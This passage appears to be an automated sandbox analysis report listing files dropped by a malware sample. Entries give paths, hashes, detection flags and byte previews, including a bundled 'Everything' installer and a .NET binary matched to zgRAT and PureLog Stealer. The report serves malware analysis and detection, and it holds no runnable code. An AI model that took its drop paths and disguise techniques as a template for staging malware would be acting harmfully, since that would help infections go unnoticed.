                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):4.8351120181527865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a1He3YP00iIHlCrev7AU5c2LHd7Mv6BJ3mYlUDJZ+AmMy:xoflCrDmc2xMv63rYA
                                                                                                          MD5:B2B308D8C164F75BC11BCCF7BAF3DF67
                                                                                                          SHA1:6F1E5561268B2DB5B46BB6F738C0F7A637FD6B6D
                                                                                                          SHA-256:F0969F438D2869641D8F76D5B9FD2B82C7232134A90972E96ABB3783D1E2FBE5
                                                                                                          SHA-512:5CB56D715D35A33E5BBC7E7DEB43E4F143E4193AE59282892FE72B82C66A21A62CEC85222A9879D5126479A59B9A5E715568F4BB62040A4C03B706F1EBDE9659
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:; Please make sure Everything is not running before modifying this file...[Everything]..; settings stored in %APPDATA%\Everything\Everything.ini..app_data=1..run_as_admin=0..allow_http_server=1..allow_etp_server=1..
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):215
                                                                                                          Entropy (8bit):4.8351120181527865
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:a1He3YP00iIHlCrev7AU5c2LHd7Mv6BJ3mYlUDJZ+AmMy:xoflCrDmc2xMv63rYA
                                                                                                          MD5:B2B308D8C164F75BC11BCCF7BAF3DF67
                                                                                                          SHA1:6F1E5561268B2DB5B46BB6F738C0F7A637FD6B6D
                                                                                                          SHA-256:F0969F438D2869641D8F76D5B9FD2B82C7232134A90972E96ABB3783D1E2FBE5
                                                                                                          SHA-512:5CB56D715D35A33E5BBC7E7DEB43E4F143E4193AE59282892FE72B82C66A21A62CEC85222A9879D5126479A59B9A5E715568F4BB62040A4C03B706F1EBDE9659
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:; Please make sure Everything is not running before modifying this file...[Everything]..; settings stored in %APPDATA%\Everything\Everything.ini..app_data=1..run_as_admin=0..allow_http_server=1..allow_etp_server=1..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          File Type:QuArk archive data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):934469
                                                                                                          Entropy (8bit):7.985150006883096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:9Uj10cDM1+8NnWk1Gmdo3eZWDmehoenMUjV7KDvl0CJ2G:YycDMrf1seuhoeMQVuDvlTJL
                                                                                                          MD5:BA118BDF7118802BEEA188727B155D5F
                                                                                                          SHA1:20FE923EC91D13F03BDB171DF2FE54772F86EBBA
                                                                                                          SHA-256:270C2DBD55642543479C7E7E62F99EC11BBC65496010B1354A2BE9482269D471
                                                                                                          SHA-512:01D8DD2BF9AA251512B6B9B47E9D966B7EDA5F76302E6441C5E7110FF37B4BE325A4F8096DF26A140C67BD740DCD720BC4E9356CCB95703AD63FE9FDBBB0C41F
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:7.......BZh91AY&SY.eg...........~..?{.....t.........Y....X.@..scu....H......P..h4. ........4...h.....@..m ....#FF!...4.......A.M..........4.......jm&M&.&....i.. ..L.LO$..0... .&!.#..4.2d.&L...0..h... ).mF.F.4..P.=@i..4..=A...............44.=A...@f4.!.'.6..!.Ex.Q.....J..B....).*.!.<.T.rd.....u..HlI2.1.....@d.d,..2..R...(.....n1.._x....... ...#E.Y..>.o,..~F....^.D.dk. ......H...$...$....]...F.....4....Bi*Cr... ._i...<.NQ....*].L.#.;...;E...;...LE....Y........5.K.r.... ,..|.J0.....6....#.DfBV....j...#..@}.....Ze]..!.xQ.T....B........i..6M...M.Eq"5.w.h.n..8...+.{.....e`.....;.p5..=j]o.`.|IC....QXUp......}....1..T.>A)......F...Y8..d$....R*.-m.?..$DL.P..0..r.....#...#.y..E..F.g&B.3.Xn......h.[%l.n.. C)j.../`T..,..6........N.4QS.5a...Q...r.g..+.......8..B..tSWbSc.S!.*......pD..j..80.....(.-....%.$a>..A....?9).jJ.lt.....B.>1..].n...pS...{.f.....p.R.#..H.:.cE.....@a..6!.*.jz)...O..!..*..$.d....n..A..6.Pdi.>...&<WT..$.i..LI...Tk..'.fp.02A....c.A.'{..`5LY..EN
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (754), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2611
                                                                                                          Entropy (8bit):5.156615896081089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:d6b8JplPvEDTQHcs5ITc3omFpNOOrYJwrYJzSEpPD0432sBp32s3Etm13t6THy:dPsvQHnodOrYJwrYJzSEhn3b3z9ITS
                                                                                                          MD5:2D8C6B891BEA32E7FA64B381CF3064C2
                                                                                                          SHA1:495396D86C96FB1CFDF56CAE7658149138056AA9
                                                                                                          SHA-256:2E017A9C091CF5293E978E796C81025DAB6973AF96CB8ACD56A04EF29703550B
                                                                                                          SHA-512:03A520F4423DA5EF158FB81C32CFFF0DEF361CC4D2CAA9CFA4D306136DA047A80A6931249A6B9C42F9F2656A27391B7921A64E10BAA7468C255BC48BD488A860
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:...Everything....Copyright (c) 2023 voidtools....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:....The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.....THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):140122
                                                                                                          Entropy (8bit):6.897821587158416
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:lfY/TU9fE9PEtuSWKBAkae31mgjrzElPZdzEB3PlhsEP4f0nlJaosDF:pYa6IZCpe31mgjr4FZuNlhs0lJvsp
                                                                                                          MD5:9619F283A8809F06D9F25818DF792798
                                                                                                          SHA1:C959694843937043B09DA5189D50553AA6C24A6E
                                                                                                          SHA-256:F5E05A0AFC32604D961F2C1B8E500D33018718C3A1D47CBC3F4A98FE0D0E9CA8
                                                                                                          SHA-512:CD84EB50FC8AD582E5B60F1FED3174564EF356673F6DBC71E14A8F07BAA7EFA28EC434AAA9594460364A15C006FA4C56CE27D58D687DCC765FE07D5CAAA3B73E
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................'Q....@..............................................................(...........................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3c961844, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1310720
                                                                                                          Entropy (8bit):0.6586142687109171
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                          MD5:52C503D85DC13876ACF5A711310ABEBB
                                                                                                          SHA1:34847AA9C9A0CB9C8E5ED41C6B355E125B4B5D16
                                                                                                          SHA-256:8B33FEA3067E9F6B4242BD491C40C0BBB4A83EFE7CD51A06EE98ADFE041C9AAE
                                                                                                          SHA-512:D45680CF52A23D9A077A918B2EC836C78270015584B24B4266B025671463C9651153CD6E6EA5B595D94A2B8B2B2C1360A4C54C797275782192262387862C4573
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:<..D... ...............X\...;...{......................0.z..........{..;....}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................E.z.;....}....................|<;....}...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Jan 8 15:12:21 2025, mtime=Wed Jan 8 15:12:22 2025, atime=Thu May 25 23:40:00 2023, length=2265096, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1074
                                                                                                          Entropy (8bit):4.655957763833524
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8muOicJYXuh9/nKmBdpF4G9llSKz/r50GWplv/r5XgIAjAsegbdp3+bdph1NJ9EC:8mBrvBdNZX0vwrAseUd5advJ93qygm
                                                                                                          MD5:76764AA4B06451C6B708DCA572EEE838
                                                                                                          SHA1:194244834945BD615E9A03834230EFD235C67634
                                                                                                          SHA-256:E6A78B4B6E1CDE25562A05E68CD817AEA5BC70085E17D41B824A76F405ACC322
                                                                                                          SHA-512:BEA9CE9A2BE7E44EF87C8CBA16E6F00FB2597E259779288994F688109ECEE8D9515CB65E7D5C72E81D9A378507E9B8D46A9882D80602AAC5A16443DC6E24261D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.... ...U....a...`1..a....+.j....."..........................P.O. .:i.....+00.../C:\.....................1.....(Z....PROGRA~1..t......O.I(Z......B...............J......"%.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....^.1.....(Z....EVERYT~1..F......(Z..(Z................................E.v.e.r.y.t.h.i.n.g.....j.2..."..V.. .EVERYT~1.EXE..N......(Z..(Z................................E.v.e.r.y.t.h.i.n.g...e.x.e.......Y...............-.......X............N.......C:\Program Files\Everything\Everything.exe..6.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.E.v.e.r.y.t.h.i.n.g.\.E.v.e.r.y.t.h.i.n.g...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.E.v.e.r.y.t.h.i.n.g.........&................c^...NI..e.2.......`.......X.......124406...........hT..CrF.f4... .D.2=.b...,...W..hT..CrF.f4... .D.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with very long lines (658), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):658
                                                                                                          Entropy (8bit):5.875144354831462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:o8rcDwGqLlyXj5xFZnhdvrOGJvD1ooM0wSfw4kfgoTxNVSSpi7nKL1M0AMkWulsc:cWLlyXtxnTrOOr1AakXVL1M0AlWuldn
                                                                                                          MD5:57FB9C3078E333EFA3CDECFA2F8F4A84
                                                                                                          SHA1:C55B0257B2DBB1595302438C2FD4A0925EBE1575
                                                                                                          SHA-256:2426AC27AD6E2799F57F74A556FEDF8EAD804DB0FC3C5CB19CB0313D328DCF93
                                                                                                          SHA-512:53651CF1D0D31DAC4270D12D8C93C56D91E5807271214E28ADE1155A907F7EE7E149349E12FB871653562C1F812B852206FEEC2F725B4A94F969D37E1898E275
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:LEplnkxXnQVOcyZhzHBfltvLOestQd9uz7tSmChLya5ovZIPvomcTFCcSeWJ1DGKRkYeEG4xk0rKyHZzVd8l0hbt4Q9IpXTuUuWLAnKouz1dY1oLEhyYFfUuIokxGwINg60DuOyrST1Bp8VCmyDHi4pyamCWDWh8qo6cBkaztGGvnTEKThLSsBomRBnIMbo5w3UBC2BBYNXcx3LHi2DfLPQp9TL97SnRcL9u8DIagJ3enLyX0fjUYItgmpBsrCDFkGAm3aIfum8BVvBxfxIbsT2TbdHSBZseGy3gLLdaXEkwJsK1nNM43lXQNqLaSzdU3e5h1flTTsEntGJsSQpxMylebmSfACHhlP2pxn9Il3kKhthHhcICKpHF3aGOMGTQlhCdNd5oQgMTNa7sFK8h4EX5IwwWhu5fjTiAqE4Dhdvndx2cdXJBIvWhKHVbriHglru317BBQ5AaStcU4T3Jk4Wx7B0jscV8VPCwD8lgWIuNv5OaoAgYp85qU65zHcSxjCEDqqR6sXwcJJCBxZ4s66SXTVbGCvY4z6ns0Kt8tkqSLchK43Brhk1ntrtVOK3682mMgTLnp59WQAL0yQMItrWPFA8JaYuiqtTS0UoksYBllfWtf3g78uMRgXHgUBNRLapgr3AdmlZVpuoknP
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2025984
                                                                                                          Entropy (8bit):7.5739640210308465
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:xq9/4rTuPInOgODSegbQddnpKSVVvncFn8:xGPIr1UDhv
                                                                                                          MD5:77967721CE1C8B3F0EB800BD33527897
                                                                                                          SHA1:6CACE6DB7C38EC0F438B9D7A2A323A90E703A904
                                                                                                          SHA-256:524FDB6F99BA45BA54D3445BFFB08D32F63E0642516DA16D4B31B8BA22325BD7
                                                                                                          SHA-512:5C0C90952462704C879125EBF9102796608DD7D8722F84183706BCB4748057ED23894E00F1D6B078AB8D8E7089B818CF9FDE7090302E83B5D0431418EC833165
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                          Reputation:unknown
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.qg................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......L...|..............7............................................0..........(.... ........8........E....)...=.......*...8$...(.... ....~....{....:....& ....8....*(.... ........8....(.... ....~....{....:....& ....8........0.......... ........8........E........f...1...v...Z...8........~....(T...~....(X... ....?>... ....8....~....:*... ....~....{....:....& ....8....r...ps....z*...... ....8q...~....(L... .... .... ....s....~....(P....... ....~....{....:1...& ....8&.....(.
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Jan 8 15:12:21 2025, mtime=Wed Jan 8 15:12:22 2025, atime=Thu May 25 23:40:00 2023, length=2265096, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1062
                                                                                                          Entropy (8bit):4.672675816995648
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:8mK2POicJYXuh9/nKmBdpF4G9llSKz/r50GWplv/ygIAjAsembdp3+bdph1NJ9EC:8morvBdNZX0lrAseCd5advJ93qygm
                                                                                                          MD5:F79A4577D07FC18722C497987CA93444
                                                                                                          SHA1:1DD2183751FC139F3C21B58BC3C3BA59726E471F
                                                                                                          SHA-256:4A0220C63869FBF7ACD1C4CF629DEDD67DCCD9073165EFF8177E79C7A87064E6
                                                                                                          SHA-512:137FDA1140B09370426FFF0D09047BB7EA9DC84D0F5411A28F12EB53F68BCC09B28B19C2DFAA67459B22D53E40DB3A5F8850D7EE0713F69285ACC57463EC6475
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.... ...U....a..z8I..a....+.j....."..........................P.O. .:i.....+00.../C:\.....................1.....(Z....PROGRA~1..t......O.I(Z......B...............J......"%.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....^.1.....(Z....EVERYT~1..F......(Z..(Z................................E.v.e.r.y.t.h.i.n.g.....j.2..."..V.. .EVERYT~1.EXE..N......(Z..(Z................................E.v.e.r.y.t.h.i.n.g...e.x.e.......Y...............-.......X............N.......C:\Program Files\Everything\Everything.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.E.v.e.r.y.t.h.i.n.g.\.E.v.e.r.y.t.h.i.n.g...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.E.v.e.r.y.t.h.i.n.g.........&................c^...NI..e.2.......`.......X.......124406...........hT..CrF.f4... .D.2=.b...,...W..hT..CrF.f4... .D.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9..
                                                                                                          Process:C:\Users\user\Desktop\wxl1r0lntg.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):128
                                                                                                          Entropy (8bit):5.152666090295162
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:QHXMKaZImrnLCg+HWN9mQLxZ2LFv:Q3LadLC1HWN9Lx+v
                                                                                                          MD5:273D3495D02634858AB97664EEA695E9
                                                                                                          SHA1:4875DE7E82848E41CBFF6DEDE96FDAF2E6777AAD
                                                                                                          SHA-256:ECE7A9B2F9249E4E14C50EE1904505BBD7AD91D0A3D16368A9465FF4392E831B
                                                                                                          SHA-512:68DF6B2577EE35FD9E14DA5DA4CD8A5977A75D4BDDEA536A9726E9CDCED029EA3D5E392BB114B1D3A9B91EF804A160D8DCEF945B25CA719CFFA30D3EE5C3EBFF
                                                                                                          Malicious:true
                                                                                                          Reputation:unknown
                                                                                                          Preview:1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\60bcd4094a2a6aa9ef85662f2bad1392\System.ni.dll",0..
                                                                                                          Process:C:\Program Files\Everything\Everything.exe
                                                                                                          File Type:CSV text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):226
                                                                                                          Entropy (8bit):5.355760272568367
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2FDkwIyp1v:Q3La/KDLI4MWuPXcp1v
                                                                                                          MD5:FC3575D5BE1A5405683DC33B66D36243
                                                                                                          SHA1:1C816D34B7D5B96E077DC3EF640BA8C7BA370502
                                                                                                          SHA-256:1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
                                                                                                          SHA-512:68914FE00F8550A623074F9ACC31ACEF8A3F6DFDDBD9FDA23512079BEC5E8A4D4E82BC8CD8D536E6C88F4DA3A704AC376785B44343BD3BED83E440857A3C0164
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..
                                                                                                          Process:C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          File Type:CSV text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):847
                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                          Process:C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1689
                                                                                                          Entropy (8bit):5.356756887109143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1HmHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj1GqZ4vtpv
                                                                                                          MD5:492A92D0EE9C7BD43DFCEC3E9B5026E2
                                                                                                          SHA1:93BC2DF595AA42E5D5EA39524B2BADCA903C964E
                                                                                                          SHA-256:03EB4302FE4EAADFA51D085CE53742C2DE6B09FDF2E3D9777E35CA638393135B
                                                                                                          SHA-512:B24A61EC3D0E8B44D65DE4DCCCB0BC8EE1F95471FEB72C529217F82B7342AC704EA38A24E698E5AE69BAF31AC28C6C1D8EE11FAEDA6BF49265F29B804B9D5F82
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                          Process:C:\Windows\apppatch\CustomSDB\sihost.exe
                                                                                                          File Type:CSV text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):847
                                                                                                          Entropy (8bit):5.354334472896228
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19253
                                                                                                          Entropy (8bit):5.005753878328145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:NlllulNg7/l/lZ:NllUy7/
                                                                                                          MD5:C2537D289A7DB67172EF4C08F96CB120
                                                                                                          SHA1:95114E0682CC761B86321F0DCC5CBE9A3E89DB21
                                                                                                          SHA-256:26D1A27AED70765338B4BCFEDC7C23289CFDA9A984B1A55799FB89CFAE10C3C9
                                                                                                          SHA-512:B991F49ECB907FA7CFCF6121BA004C1C5156A86F508E22B76FD1E53B21B7D6C4831EFF8EBCFB2CC9CB97E44DD578B276B734CB1D3CE96355E51C4578FB227603
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:@...e................................................@..........
                                                                                                          Process:C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
